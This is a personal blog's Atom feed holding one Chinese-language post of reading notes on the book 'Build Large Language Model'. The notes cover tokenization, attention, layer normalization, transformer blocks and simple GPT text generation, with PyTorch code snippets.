<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://crabin.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://crabin.github.io/" rel="alternate" type="text/html" /><updated>2026-03-27T10:06:00+00:00</updated><id>https://crabin.github.io/feed.xml</id><title type="html">LI’s personal homepage</title><subtitle>Welcome to my personal homepage</subtitle><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><entry><title type="html">Build Large Language Model</title><link href="https://crabin.github.io/posts/2025/3/Build%20Large%20Language%20Model/" rel="alternate" type="text/html" title="Build Large Language Model" /><published>2025-03-13T00:00:00+00:00</published><updated>2025-03-13T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2025/3/Build%20Large%20Language%20Model</id><content type="html" xml:base="https://crabin.github.io/posts/2025/3/Build%20Large%20Language%20Model/"><![CDATA[<h1 id="阅读图书build-large-language-model">阅读图书Build Large Language Model</h1>

<p><a href="https://moored-dumpling-e31.notion.site/Build-Large-Language-Model-196f92fc811b80e08946e8938d1bc28e">查看Notion版本的发布网站</a></p>

<p>日期: 2025年2月9日 → 2025年2月28日
状态: 进行中</p>

<p>AI 安全</p>

<p>注意力机制</p>

<p><a href="https://blog.csdn.net/weixin_42110638/article/details/134011134">https://blog.csdn.net/weixin_42110638/article/details/134011134</a></p>

<p>深度解析注意力机制</p>

<p><a href="https://mp.weixin.qq.com/s/Qlf33S3UkxO8Kui1XfH_Fg">https://mp.weixin.qq.com/s/Qlf33S3UkxO8Kui1XfH_Fg</a></p>

<p>蒸馏算法，使用大模型训练出小模型，大模型在给小模型训练时候会给出正确数据的同时会给出极小概率的其他可能性，比如在识别手写2图片时候，在告诉这个是2的同时会给他0.00001的可能性为3，0.00000001可能性为7，在小模型没有遇到过3，7的情况下也有可能识别出来这个是3，7.这个就可以提高模型泛化，同时由大模型训练出的小模型比单独训练的小模型准确率要好。</p>

<p>对这个方向研究在IDS上的运用。尝试研究。</p>

<h1 id="开始">开始</h1>

<p><img src="阅读图书Build Large Language Model\image.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h1 id="第2章-working-with-text-data">第2章 Working with Text Data</h1>

<p>介绍从text数据转化为token_id的过程，介绍原理。可以直接使用</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">tiktoken</span> 
 
<span class="n">tokenizer</span> <span class="o">=</span> <span class="n">tiktoken</span><span class="p">.</span><span class="n">get_encoding</span><span class="p">(</span><span class="s">"gpt2"</span><span class="p">)</span>
</code></pre></div></div>

<ol>
  <li><strong>文本到数值向量的转换</strong>：LLMs无法直接处理原始文本，因此需要将文本转换为数值向量（嵌入）。嵌入将离散数据（如单词或图像）转换为连续的向量空间，使其适用于神经网络操作。</li>
  <li><strong>分词与标记化</strong>：首先，原始文本被分解为标记（tokens），标记可以是单词或字符。然后，这些标记被转换为整数表示，称为标记ID。</li>
  <li><strong>特殊标记</strong>：为了增强模型的理解能力，可以添加特殊标记（如<code class="language-plaintext highlighter-rouge">&lt;|unk|&gt;</code>表示未知单词，<code class="language-plaintext highlighter-rouge">&lt;|endoftext|&gt;</code>表示文本结束），以处理不同上下文。</li>
  <li><strong>字节对编码（BPE）</strong>：GPT-2和GPT-3等模型使用BPE分词器，能够通过将未知单词分解为子词单元或单个字符来高效处理它们。</li>
  <li><strong>滑动窗口方法</strong>：在训练LLMs时，使用滑动窗口方法在标记化数据上生成输入-目标对。</li>
  <li><strong>嵌入层</strong>：在PyTorch中，嵌入层通过查找操作检索与标记ID对应的向量，生成连续的标记表示，这对训练深度学习模型至关重要。</li>
  <li><strong>位置嵌入</strong>：为了表示标记在序列中的位置，有两种主要的位置嵌入方法：绝对位置嵌入和相对位置嵌入。OpenAI的GPT模型使用绝对位置嵌入，将其添加到标记嵌入向量中，并在模型训练过程中进行优化。</li>
</ol>

<h1 id="第3章-coding-attention-mechanisms">第3章 Coding Attention Mechanisms</h1>

<p>主要介绍了注意力机制及其在大型语言模型（LLMs）中的应用</p>

<p><img src="阅读图书Build Large Language Model\image 1.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<ol>
  <li><strong>注意力机制的作用</strong>：注意力机制将输入元素转换为增强的上下文向量表示，这些表示包含了所有输入的信息。</li>
  <li><strong>自注意力机制</strong>：自注意力机制通过计算输入元素的加权和来生成上下文向量表示。在简化的注意力机制中，注意力权重通过点积计算。</li>
  <li><strong>点积与矩阵乘法</strong>：点积是对两个向量逐元素相乘后求和，矩阵乘法可以高效地替代嵌套循环，使计算更紧凑和高效。</li>
  <li>
    <p><strong>缩放点积注意力</strong>：LLMs中使用的自注意力机制（称为缩放点积注意力）引入了可训练的权重矩阵，用于计算输入的中间变换：查询（queries）、值（values）和键（keys）。</p>

    <p><img src="阅读图书Build Large Language Model\image%202.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%203.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
  <li>
    <p><strong>因果注意力掩码(causal attention mask)</strong>：在从左到右生成文本的LLMs中，使用因果注意力掩码来防止模型访问未来的标记（tokens）。</p>

    <p><img src="阅读图书Build Large Language Model\image%204.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%205.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
  <li>
    <p><strong>Dropout掩码</strong>：除了因果注意力掩码，还可以添加Dropout掩码以减少LLMs的过拟合。</p>

    <p><img src="阅读图书Build Large Language Model\image%206.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%207.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
  <li>
    <p><strong>多头注意力</strong>：基于Transformer的LLMs使用多头注意力机制，即多个因果注意力模块的堆叠。通过批处理矩阵乘法可以更高效地实现多头注意力模块。</p>

    <p><img src="阅读图书Build Large Language Model\image%208.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
</ol>

<h1 id="第4章implementing-a-gpt-model-from--scratch-to-generate-text">第4章Implementing a GPT model from  Scratch To Generate Text</h1>

<p>说明GPT模型的核心组件（如层归一化、快捷连接和Transformer块）、模型规模以及文本生成的基本原理，同时强调了模型训练的关键作用</p>

<p><img src="阅读图书Build Large Language Model\image%209.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2010.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2011.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2012.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<ol>
  <li>
    <p><strong>层归一化（Layer Normalization）</strong>：通过确保每一层的输出具有一致的均值和方差，层归一化能够稳定训练过程。</p>

    <p><img src="阅读图书Build Large Language Model\image%2013.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">class</span> <span class="nc">LayerNorm</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">emb_dim</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">eps</span> <span class="o">=</span> <span class="mf">1e-5</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Parameter</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">ones</span><span class="p">(</span><span class="n">emb_dim</span><span class="p">))</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Parameter</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">zeros</span><span class="p">(</span><span class="n">emb_dim</span><span class="p">))</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
         <span class="n">mean</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">mean</span><span class="p">(</span><span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">keepdim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
         <span class="n">var</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">var</span><span class="p">(</span><span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">keepdim</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">unbiased</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
         <span class="n">norm_x</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">mean</span><span class="p">)</span> <span class="o">/</span> <span class="n">torch</span><span class="p">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">var</span> <span class="o">+</span> <span class="bp">self</span><span class="p">.</span><span class="n">eps</span><span class="p">)</span>
         <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">scale</span> <span class="o">*</span> <span class="n">norm_x</span> <span class="o">+</span> <span class="bp">self</span><span class="p">.</span><span class="n">shift</span>
</code></pre></div>    </div>
  </li>
  <li>
    <p><strong>forward network</strong></p>

    <p>使用GELU activations而不是ReLU activations防止梯度消失</p>

    <p><img src="阅读图书Build Large Language Model\image%2014.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%2015.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
  <li><strong>快捷连接（Shortcut Connections）</strong>：快捷连接通过将某一层的输出直接传递到更深的层，跳过一个或多个层，从而缓解深度神经网络（如LLMs）训练中的梯度消失问题。
    <ul>
      <li>在深层网络中，梯度在反向传播时需要通过多个层逐层传递。如果每一层的梯度值较小，经过多层传递后，梯度可能会变得非常小，甚至趋近于零（梯度消失）。</li>
      <li>快捷连接通过跳过某些层，为梯度提供了一条<strong>直接的传播路径</strong>，使得梯度能够更高效地传递到浅层网络，避免因多层传递而导致的梯度衰减。</li>
    </ul>

    <p><img src="阅读图书Build Large Language Model\image%2016.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">class</span> <span class="nc">ExampleDeepNeuralNetwork</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">layer_sizes</span><span class="p">,</span> <span class="n">use_shortcut</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">use_shortcut</span> <span class="o">=</span> <span class="n">use_shortcut</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">layers</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">ModuleList</span><span class="p">([</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">3</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">4</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">5</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">())</span>
         <span class="p">])</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
         <span class="k">for</span> <span class="n">layer</span> <span class="ow">in</span> <span class="bp">self</span><span class="p">.</span><span class="n">layers</span><span class="p">:</span>
             <span class="c1"># Compute the output of the current layer
</span>             <span class="n">layer_output</span> <span class="o">=</span> <span class="n">layer</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
             <span class="c1"># Check if shortcut can be applied
</span>             <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">use_shortcut</span> <span class="ow">and</span> <span class="n">x</span><span class="p">.</span><span class="n">shape</span> <span class="o">==</span> <span class="n">layer_output</span><span class="p">.</span><span class="n">shape</span><span class="p">:</span>
                 <span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">layer_output</span>
             <span class="k">else</span><span class="p">:</span>
                 <span class="n">x</span> <span class="o">=</span> <span class="n">layer_output</span>
         <span class="k">return</span> <span class="n">x</span>
    
 <span class="k">def</span> <span class="nf">print_gradients</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
     <span class="c1"># Forward pass
</span>     <span class="n">output</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
     <span class="n">target</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([[</span><span class="mf">0.</span><span class="p">]])</span>
    
     <span class="c1"># Calculate loss based on how close the target
</span>     <span class="c1"># and output are
</span>     <span class="n">loss</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">MSELoss</span><span class="p">()</span>
     <span class="n">loss</span> <span class="o">=</span> <span class="n">loss</span><span class="p">(</span><span class="n">output</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
        
     <span class="c1"># Backward pass to calculate the gradients
</span>     <span class="n">loss</span><span class="p">.</span><span class="n">backward</span><span class="p">()</span>
    
     <span class="k">for</span> <span class="n">name</span><span class="p">,</span> <span class="n">param</span> <span class="ow">in</span> <span class="n">model</span><span class="p">.</span><span class="n">named_parameters</span><span class="p">():</span>
         <span class="k">if</span> <span class="s">'weight'</span> <span class="ow">in</span> <span class="n">name</span><span class="p">:</span>
             <span class="c1"># Print the mean absolute gradient of the weights
</span>             <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">name</span><span class="si">}</span><span class="s"> has gradient mean of </span><span class="si">{</span><span class="n">param</span><span class="p">.</span><span class="n">grad</span><span class="p">.</span><span class="nb">abs</span><span class="p">().</span><span class="n">mean</span><span class="p">().</span><span class="n">item</span><span class="p">()</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
</code></pre></div>    </div>
  </li>
  <li>
    <p><strong>Transformer块</strong>：Transformer块是GPT模型的核心结构组件，结合了掩码多头注意力模块和全连接的前馈神经网络（使用GELU激活函数）。</p>

    <p><img src="阅读图书Build Large Language Model\image%2017.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    
 <span class="k">class</span> <span class="nc">TransformerBlock</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cfg</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">att</span> <span class="o">=</span> <span class="n">MultiHeadAttention</span><span class="p">(</span>
             <span class="n">d_in</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">],</span>
             <span class="n">d_out</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">],</span>
             <span class="n">context_length</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
             <span class="n">num_heads</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"n_heads"</span><span class="p">],</span> 
             <span class="n">dropout</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"drop_rate"</span><span class="p">],</span>
             <span class="n">qkv_bias</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"qkv_bias"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">ff</span> <span class="o">=</span> <span class="n">FeedForward</span><span class="p">(</span><span class="n">cfg</span><span class="p">)</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">norm1</span> <span class="o">=</span> <span class="n">LayerNorm</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">norm2</span> <span class="o">=</span> <span class="n">LayerNorm</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">drop_shortcut</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"drop_rate"</span><span class="p">])</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
         <span class="c1"># Shortcut connection for attention block
</span>         <span class="n">shortcut</span> <span class="o">=</span> <span class="n">x</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">norm1</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">att</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>  <span class="c1"># Shape [batch_size, num_tokens, emb_size]
</span>         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop_shortcut</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">shortcut</span>  <span class="c1"># Add the original input back
</span>    
         <span class="c1"># Shortcut connection for feed forward block
</span>         <span class="n">shortcut</span> <span class="o">=</span> <span class="n">x</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">norm2</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">ff</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop_shortcut</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">shortcut</span>  <span class="c1"># Add the original input back
</span>    
         <span class="k">return</span> <span class="n">x</span>
</code></pre></div>    </div>
  </li>
  <li>
    <p><strong>GPT模型</strong>：GPT模型是由多个重复的Transformer块组成的大型语言模型（LLMs），参数规模从数百万到数十亿不等。不同规模的GPT模型（如1.24亿、3.45亿、7.62亿和15.42亿参数）可以使用相同的Python类（如<code class="language-plaintext highlighter-rouge">GPTModel</code>）实现。</p>

    <p><img src="阅读图书Build Large Language Model\image%2018.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">class</span> <span class="nc">GPTModel</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cfg</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">tok_emb</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"vocab_size"</span><span class="p">],</span> <span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">pos_emb</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span> <span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">drop_emb</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"drop_rate"</span><span class="p">])</span>
            
         <span class="bp">self</span><span class="p">.</span><span class="n">trf_blocks</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span>
             <span class="o">*</span><span class="p">[</span><span class="n">TransformerBlock</span><span class="p">(</span><span class="n">cfg</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"n_layers"</span><span class="p">])])</span>
            
         <span class="bp">self</span><span class="p">.</span><span class="n">final_norm</span> <span class="o">=</span> <span class="n">LayerNorm</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">out_head</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span>
             <span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">],</span> <span class="n">cfg</span><span class="p">[</span><span class="s">"vocab_size"</span><span class="p">],</span> <span class="n">bias</span><span class="o">=</span><span class="bp">False</span>
         <span class="p">)</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">in_idx</span><span class="p">):</span>
         <span class="n">batch_size</span><span class="p">,</span> <span class="n">seq_len</span> <span class="o">=</span> <span class="n">in_idx</span><span class="p">.</span><span class="n">shape</span>
         <span class="n">tok_embeds</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">tok_emb</span><span class="p">(</span><span class="n">in_idx</span><span class="p">)</span>
         <span class="n">pos_embeds</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">arange</span><span class="p">(</span><span class="n">seq_len</span><span class="p">,</span> <span class="n">device</span><span class="o">=</span><span class="n">in_idx</span><span class="p">.</span><span class="n">device</span><span class="p">))</span>
         <span class="n">x</span> <span class="o">=</span> <span class="n">tok_embeds</span> <span class="o">+</span> <span class="n">pos_embeds</span>  <span class="c1"># Shape [batch_size, num_tokens, emb_size]
</span>         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop_emb</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">final_norm</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">logits</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">out_head</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="k">return</span> <span class="n">logits</span>
</code></pre></div>    </div>
  </li>
  <li>
    <p><strong>文本生成</strong>：GPT模型的文本生成能力涉及将输出张量解码为人类可读的文本，基于给定的输入上下文逐词预测。未经训练的GPT模型会生成不连贯的文本，这凸显了模型训练对于生成连贯文本的重要性。</p>

    <p><img src="阅读图书Build Large Language Model\image%2019.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%2020.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">def</span> <span class="nf">generate_text_simple</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">idx</span><span class="p">,</span> <span class="n">max_new_tokens</span><span class="p">,</span> <span class="n">context_size</span><span class="p">):</span>
     <span class="c1"># idx is (batch, n_tokens) array of indices in the current context
</span>     <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">max_new_tokens</span><span class="p">):</span>
            
         <span class="c1"># Crop current context if it exceeds the supported context size
</span>         <span class="c1"># E.g., if LLM supports only 5 tokens, and the context size is 10
</span>         <span class="c1"># then only the last 5 tokens are used as context
</span>         <span class="n">idx_cond</span> <span class="o">=</span> <span class="n">idx</span><span class="p">[:,</span> <span class="o">-</span><span class="n">context_size</span><span class="p">:]</span>
            
         <span class="c1"># Get the predictions
</span>         <span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span>
             <span class="n">logits</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">idx_cond</span><span class="p">)</span>
            
         <span class="c1"># Focus only on the last time step
</span>         <span class="c1"># (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
</span>         <span class="n">logits</span> <span class="o">=</span> <span class="n">logits</span><span class="p">[:,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="p">:]</span>  
    
         <span class="c1"># Apply softmax to get probabilities
</span>         <span class="n">probas</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># (batch, vocab_size)
</span>    
         <span class="c1"># Get the idx of the vocab entry with the highest probability value
</span>         <span class="n">idx_next</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">probas</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">keepdim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>  <span class="c1"># (batch, 1)
</span>    
         <span class="c1"># Append sampled index to the running sequence
</span>         <span class="n">idx</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">idx</span><span class="p">,</span> <span class="n">idx_next</span><span class="p">),</span> <span class="n">dim</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># (batch, n_tokens+1)
</span>    
     <span class="k">return</span> <span class="n">idx</span>
     
  <span class="n">start_context</span> <span class="o">=</span> <span class="s">"Hello, I am"</span>
    
 <span class="n">encoded</span> <span class="o">=</span> <span class="n">tokenizer</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="n">start_context</span><span class="p">)</span>
 <span class="k">print</span><span class="p">(</span><span class="s">"encoded:"</span><span class="p">,</span> <span class="n">encoded</span><span class="p">)</span>
    
 <span class="n">encoded_tensor</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">(</span><span class="n">encoded</span><span class="p">).</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
 <span class="k">print</span><span class="p">(</span><span class="s">"encoded_tensor.shape:"</span><span class="p">,</span> <span class="n">encoded_tensor</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span>
 <span class="n">model</span><span class="p">.</span><span class="nb">eval</span><span class="p">()</span> <span class="c1"># disable dropout
</span>    
 <span class="n">out</span> <span class="o">=</span> <span class="n">generate_text_simple</span><span class="p">(</span>
     <span class="n">model</span><span class="o">=</span><span class="n">model</span><span class="p">,</span>
     <span class="n">idx</span><span class="o">=</span><span class="n">encoded_tensor</span><span class="p">,</span> 
     <span class="n">max_new_tokens</span><span class="o">=</span><span class="mi">6</span><span class="p">,</span> 
     <span class="n">context_size</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">]</span>
 <span class="p">)</span>
    
